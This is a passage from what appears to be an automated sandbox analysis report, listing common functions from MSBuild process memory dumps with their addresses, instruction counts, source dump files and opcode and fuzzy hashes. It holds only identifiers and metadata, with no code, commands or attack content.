                                                                  • Opcode Fuzzy Hash: cb9e6b7abf88ae901369e65c1fb042797606e4be52e95861a9d763571e1c4c4c
                                                                  • Instruction Fuzzy Hash: 0261F4B1F000114FDB04AB6ECC84A5FAAEBEFC5620B1A4475D80ADB361DF79ED428791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232342B8 Relevance: .2, Instructions: 222COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 141ae4f4a3982e4d49b6e48cc25b98ec8388e73da203df4ef2febedcd3dd8d31
                                                                  • Instruction ID: 7f300a8633afef95ff56dc84d76e217fa49f382ce00d8bc82a37260a7873e057
                                                                  • Opcode Fuzzy Hash: 141ae4f4a3982e4d49b6e48cc25b98ec8388e73da203df4ef2febedcd3dd8d31
                                                                  • Instruction Fuzzy Hash: 38815F70B002098FDB44DFA9C864B9EBBF6AF89700F248579D519EB345DB34DD828B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232342C8 Relevance: .2, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 18104bc0aab562534a48b104fc8c5a519f9be026fd90f78ae29ac2a62a8d73b4
                                                                  • Instruction ID: a23a58df8b8b2711ab1bd40cd98705cb6da7d025736c9fb677ec03f00ae2807e
                                                                  • Opcode Fuzzy Hash: 18104bc0aab562534a48b104fc8c5a519f9be026fd90f78ae29ac2a62a8d73b4
                                                                  • Instruction Fuzzy Hash: F6814E70B006098BDB04DFA9C864B5E7BF6AF89700F208579D41AEB385DB34DD828B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23234DCC Relevance: .2, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ede59e1c00b8171dbc55c40becd2b51340159aa3e5e1b68940cdd0076d1d74eb
                                                                  • Instruction ID: 2ee85f4aa8832297a18ce33bef27e9b81e0300aef1ed1d247bd928e7cf151c59
                                                                  • Opcode Fuzzy Hash: ede59e1c00b8171dbc55c40becd2b51340159aa3e5e1b68940cdd0076d1d74eb
                                                                  • Instruction Fuzzy Hash: 57814B30B10218DFDB54DFA8C854B6D7BF6BF88700F6085A9E509AB3A5CF759D418B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323EF38 Relevance: .2, Instructions: 204COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3e621bc78c83b3bf17743225de78ca5d1502ed09963bd6ea98d3c60a73d0440
                                                                  • Instruction ID: 188a5072803da613b7f478c0e1a27ab645b0baa33522cdb5faafc0f7d583740a
                                                                  • Opcode Fuzzy Hash: f3e621bc78c83b3bf17743225de78ca5d1502ed09963bd6ea98d3c60a73d0440
                                                                  • Instruction Fuzzy Hash: A1716C70B002099FDB04DFA9D980A9EBBFAFF85700F248569E005AB355DB74ED86CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323EF48 Relevance: .2, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ea77cd3358f1b8bd93b6d43ad3d5facbf4179ab92580a8ed7a82754416a61cc
                                                                  • Instruction ID: f6fa027a166f9690f5ceb36efff0082b164009862e32ad6893db94d1d970ec5a
                                                                  • Opcode Fuzzy Hash: 6ea77cd3358f1b8bd93b6d43ad3d5facbf4179ab92580a8ed7a82754416a61cc
                                                                  • Instruction Fuzzy Hash: 1F715B71B002099FDB04DFA9D980A9EBBFAFF85700F248569E005AB355DB74ED86CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323FCB0 Relevance: .2, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f089c10813babcdfa18a8bb579a0e42d6251332c25b8a9bdcd11ff5fe3166115
                                                                  • Instruction ID: 256050373a3875a1667a42ea7bd7bde8780cf4f3eb1165846ef0c1630ea520b8
                                                                  • Opcode Fuzzy Hash: f089c10813babcdfa18a8bb579a0e42d6251332c25b8a9bdcd11ff5fe3166115
                                                                  • Instruction Fuzzy Hash: 2D51E371B0120AEFDB14EFB8E84869DB7B5EB89311F1088B9E106D7252DF359995CBC0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323FA52 Relevance: .2, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85873211b7014643084385fcc8a86d292f09926ea07e300f89cb5b41724c61f6
                                                                  • Instruction ID: a831cb2918ce1b696e707c591ff14d6e8a818019ac7d7579748890df1ad57637
                                                                  • Opcode Fuzzy Hash: 85873211b7014643084385fcc8a86d292f09926ea07e300f89cb5b41724c61f6
                                                                  • Instruction Fuzzy Hash: 0C5175B0700329AFEB24AAACDC5475F26AED78E750F144876D40AC7396CE3CCD8587A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23239167 Relevance: .2, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2056e9db3bc59f630ac18bbe5c07f501eb52345d982a39f8278611dd7db2a69a
                                                                  • Instruction ID: dcf7cdeaf4a29d04a09652d920c0680600aec42c1b5af4851e92f7732e315f07
                                                                  • Opcode Fuzzy Hash: 2056e9db3bc59f630ac18bbe5c07f501eb52345d982a39f8278611dd7db2a69a
                                                                  • Instruction Fuzzy Hash: 8C518170B006159FEB54DB79CC60B6E77F6AF8A700F108469D915EB384EB34AC41CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323FA60 Relevance: .2, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7d376444eafb33973068085e588a2b3abd0bfe8fb723153c541944131c2dbc1
                                                                  • Instruction ID: 6d7ba53450d635732bce483d1c34b9ca809ca8a78af045bddc9741654c430e87
                                                                  • Opcode Fuzzy Hash: b7d376444eafb33973068085e588a2b3abd0bfe8fb723153c541944131c2dbc1
                                                                  • Instruction Fuzzy Hash: BC5184B0700329AFEB14AAACDC5475F26AED78A710F144835E40AC7396CE3CCD8187A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23235438 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30382e94f2a9204ed4fafc8444f0b5fb183b39b7634ce541cbe18e6e2be640bb
                                                                  • Instruction ID: 207ea8ba6840f4edf2c455883dc8cb7217a8e5a2f18cb480eddb1f3b38ecf3c3
                                                                  • Opcode Fuzzy Hash: 30382e94f2a9204ed4fafc8444f0b5fb183b39b7634ce541cbe18e6e2be640bb
                                                                  • Instruction Fuzzy Hash: 76419471A0060A8FDB24DFA9DC80A9FF7FAFF85310F20496AD259D7641D331E9858B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323DAE5 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b75b08c21789ed20b5496f85227453aae9db508d3cf656649172f30040a5d26f
                                                                  • Instruction ID: db7bc71338d5df3c491ce21f086fe904ab85cc2fae74a5ed52e8c30c9cbe5b4f
                                                                  • Opcode Fuzzy Hash: b75b08c21789ed20b5496f85227453aae9db508d3cf656649172f30040a5d26f
                                                                  • Instruction Fuzzy Hash: E5419370A0034ADFDB15DFA5C890B8EBBB6FF46300F14856AE415EB241DB74E986CB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323DAF8 Relevance: .1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d13b278f101b66af012588f19b4f0afc722760a07e3b832ea795092c371373d2
                                                                  • Instruction ID: ec47413fde53696e146df6f34bd26f3d0d34a1e615af726fc8301392532aeab8
                                                                  • Opcode Fuzzy Hash: d13b278f101b66af012588f19b4f0afc722760a07e3b832ea795092c371373d2
                                                                  • Instruction Fuzzy Hash: BE4182B0A1020ADFDB14DFA5C854B9EBBB6FF86300F14896AE415E7240DB74D986CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232321BD Relevance: .1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 249da82d1cbfb44ec8633e2973986eebec8a51766c17439af01df4846de08f2e
                                                                  • Instruction ID: 238f00d241b791f2521e23e0ee2de2933a7c9c50d86c3d1117b376f13b162bf8
                                                                  • Opcode Fuzzy Hash: 249da82d1cbfb44ec8633e2973986eebec8a51766c17439af01df4846de08f2e
                                                                  • Instruction Fuzzy Hash: 1231F3307143858FDB05ABB8CC64A5E7BB7AB8A600F1485ACD402DB382DF35DD86C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232321D0 Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 26749ed25992675c34481308275770a7d2f408c9c0bf20d1c91a09c0154c6965
                                                                  • Instruction ID: 8711b2c14c2f603ed649bd4d2936b1104df7e39a785c5229422baa3561070b7f
                                                                  • Opcode Fuzzy Hash: 26749ed25992675c34481308275770a7d2f408c9c0bf20d1c91a09c0154c6965
                                                                  • Instruction Fuzzy Hash: 5D31C3707103498FDB04AB78CC54B5E3BA7AB8A600F148468D406DB381DF35DD82C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04232998 Relevance: .1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 32a4d5ae6dd6908cd69c49dc482b96bbe069a8cccb1ad08eb44fc158f54b73b3
                                                                  • Instruction ID: 572a9c2e46d00b0da5b5c54767364bcb91b7f222b829493064165c2d9ddca0c1
                                                                  • Opcode Fuzzy Hash: 32a4d5ae6dd6908cd69c49dc482b96bbe069a8cccb1ad08eb44fc158f54b73b3
                                                                  • Instruction Fuzzy Hash: 33318E70B0021ADFDF20DF68D880AAEB7B5EF85700F108968D005D7351EB39A946CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042329A8 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57d920b985a50d5dedaf7209356b490b5f98955474274d2395e45e9080cc67c1
                                                                  • Instruction ID: 4e18e8d4985c02d6b7b6cc5967baafddff90b2bc95da84b64e4eb1c4cbaed7d0
                                                                  • Opcode Fuzzy Hash: 57d920b985a50d5dedaf7209356b490b5f98955474274d2395e45e9080cc67c1
                                                                  • Instruction Fuzzy Hash: 99313E70B0021A9FDF14DF68D880AAEB7B5EB85710F108968D416E7351DB39ED45CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233AB8 Relevance: .1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac0ccdfe283e9f6a88c66cc492f86eed540adaaf727b8aed1eb5fc2d6e876f0f
                                                                  • Instruction ID: 51f63dc9a0aa3c32049522af352355282b77245643e677469b240821b47c72cf
                                                                  • Opcode Fuzzy Hash: ac0ccdfe283e9f6a88c66cc492f86eed540adaaf727b8aed1eb5fc2d6e876f0f
                                                                  • Instruction Fuzzy Hash: A5216875F442059FDB10CFA8CD40A9EBBF6AB88720F148069EA14EB251D735D981CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236D21 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56f0806e03f0aa064d74e65a7bda40944a1eda55ab782f7b3d45957a868902a1
                                                                  • Instruction ID: ea70fb430ec0582d914c1bf404b298b1775501ad7c7d29dae2d8db5e93aaefa6
                                                                  • Opcode Fuzzy Hash: 56f0806e03f0aa064d74e65a7bda40944a1eda55ab782f7b3d45957a868902a1
                                                                  • Instruction Fuzzy Hash: 20210870B001089FDF44DB6CDD946ADBBBADB86310F188569D405EB351DB71ED818790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233AC8 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d71d3235c306e6c8628dedc05f2fdb799ef86910296a2e7a71051f7da4f735a
                                                                  • Instruction ID: be9bca47ada03a8e3557ef913a4b17ffa36f14cce8d6a841729fc9d96251b489
                                                                  • Opcode Fuzzy Hash: 5d71d3235c306e6c8628dedc05f2fdb799ef86910296a2e7a71051f7da4f735a
                                                                  • Instruction Fuzzy Hash: 66216BB5B042159FDB10DFA9CD80A9EBBF6EB88710F148069EA15E7341E735D940CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0070D3EC Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586159739.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_70d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93a3b6a3c04133ba181898ed0c93fe42a7428adbc9d6d93b7654b9ea6bc6d370
                                                                  • Instruction ID: 2d4d6206d74cb6cb74877ed51c4a60c1e8f66feab3ab1d1f962e3671877f3563
                                                                  • Opcode Fuzzy Hash: 93a3b6a3c04133ba181898ed0c93fe42a7428adbc9d6d93b7654b9ea6bc6d370
                                                                  • Instruction Fuzzy Hash: C621F7B1500384DFDB14DF90D9C0F16BBA1FB94324F20C669ED090B286C33AE856C6A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D044 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af43c95f2d6bd23bc6a7b9c0ac54ba3a9fd23908263a8ce88a9168a5f99c9e03
                                                                  • Instruction ID: c15bd2c17155f94254c7137b0ae1459dc054eada13d6d3526f2ab6753f569d46
                                                                  • Opcode Fuzzy Hash: af43c95f2d6bd23bc6a7b9c0ac54ba3a9fd23908263a8ce88a9168a5f99c9e03
                                                                  • Instruction Fuzzy Hash: B421D376504308AFDB14DF50E9C4B16BB61FB84314F30C56DE84E4B281C73AD846CA62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D20C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f429cea5b2fa2d22b126c48469b4fdc756c0482c4627f117f2000866a2b67cc3
                                                                  • Instruction ID: c2532a0b1dca09a42ec3230f7ab1b736397dbf22c2103b55e98f914196178fb0
                                                                  • Opcode Fuzzy Hash: f429cea5b2fa2d22b126c48469b4fdc756c0482c4627f117f2000866a2b67cc3
                                                                  • Instruction Fuzzy Hash: D82123B2504348EFDB00DF90E8C4B66BB65FB88324F30C669D8490B281C37AD806CA62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D3BC Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 561debc2f15018c716f8668d004aaeb695deae997ef46d5cb9e5e198e0f256ea
                                                                  • Instruction ID: 7aa822cb6eed88658fd0d61ad6514d8d4be234c49a60b38a6dc5b6abf8f9c78a
                                                                  • Opcode Fuzzy Hash: 561debc2f15018c716f8668d004aaeb695deae997ef46d5cb9e5e198e0f256ea
                                                                  • Instruction Fuzzy Hash: 3721F2B2504308EFDB04DF90E9C0B26BB61FB84314F30C56DD8094B286C37BE846CA62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231E58 Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2fdfffd1a7abd4786e85c5d12d39c42b09c15680c015ef755901c6b4d9aa232
                                                                  • Instruction ID: 6c1b86cd64600beb6178c398d4a4761b6df5b921fdf5acaad27729035b5ab1d3
                                                                  • Opcode Fuzzy Hash: d2fdfffd1a7abd4786e85c5d12d39c42b09c15680c015ef755901c6b4d9aa232
                                                                  • Instruction Fuzzy Hash: 3E3124B0D11218DFEB24DF99C584BDEBBF4EB48714F24805AE404BB240D7B4A944CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042324C4 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f05a4793cf958c179254e4f1954631b9b97f8d09381014b192cd6130a952c495
                                                                  • Instruction ID: 36dcb76e5c6b3579530d618c6d4562e52f26ab463f68026809ab72b58dba79a0
                                                                  • Opcode Fuzzy Hash: f05a4793cf958c179254e4f1954631b9b97f8d09381014b192cd6130a952c495
                                                                  • Instruction Fuzzy Hash: 1531F1B0D11218DFEB24CF99C584BDEBBF5AB48714F24805AE408AB350C7B5A945CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236D30 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c22c88f2b7a9767362b6b90c07c42b2a8e047bc94d01bcfc8898098b089c0928
                                                                  • Instruction ID: 0e8daeec882f79d21f11559ffe240deff0fc1d70ca1772e5b2644e611829422a
                                                                  • Opcode Fuzzy Hash: c22c88f2b7a9767362b6b90c07c42b2a8e047bc94d01bcfc8898098b089c0928
                                                                  • Instruction Fuzzy Hash: F1219D70B101189BDF08DB6DDD90A9EBBBAEB86350F148475E405EB381DB35EE818790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233BD8 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a41bf1caf0cf8414768fab41a41a5b3a5bd73e76b892ebc2d8e2a663ba8aac61
                                                                  • Instruction ID: ce34c2c82a160c05ada1b46d26787c3c03ee168311b5ffa27220c35e405bce92
                                                                  • Opcode Fuzzy Hash: a41bf1caf0cf8414768fab41a41a5b3a5bd73e76b892ebc2d8e2a663ba8aac61
                                                                  • Instruction Fuzzy Hash: 2B118B32B041288BDB58967DCC24AAE77BAEBC9710F058579D505EB344DF38DE4287E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323804F Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08f17c95ba6631bd3d4c46271da83ac52db4e8543ea52721e8e99165665a26f9
                                                                  • Instruction ID: 0f53d0348f5f914bc491a78aeb2f5e6e556dd704f0d3bb526b891782a9dec5c2
                                                                  • Opcode Fuzzy Hash: 08f17c95ba6631bd3d4c46271da83ac52db4e8543ea52721e8e99165665a26f9
                                                                  • Instruction Fuzzy Hash: 05116272714311DBDB254A64CC91A9BBBA8EF82620F0580F5EA40EF192C731998DCB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323C7F9 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b78994c97dae80da22af2e94de842ff6c7706c5c7a649fe36e38f970c14781
                                                                  • Instruction ID: 9755c5818850370a85260df351ef5d4c223176b23e7470b63fd58b74fd94fb9f
                                                                  • Opcode Fuzzy Hash: 30b78994c97dae80da22af2e94de842ff6c7706c5c7a649fe36e38f970c14781
                                                                  • Instruction Fuzzy Hash: 6D112B70B10234A7CB169F68EC449897769EB46350F1452B9EA10DB386C771A98187C1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0070D3E7 Relevance: .1, Instructions: 56COMMON
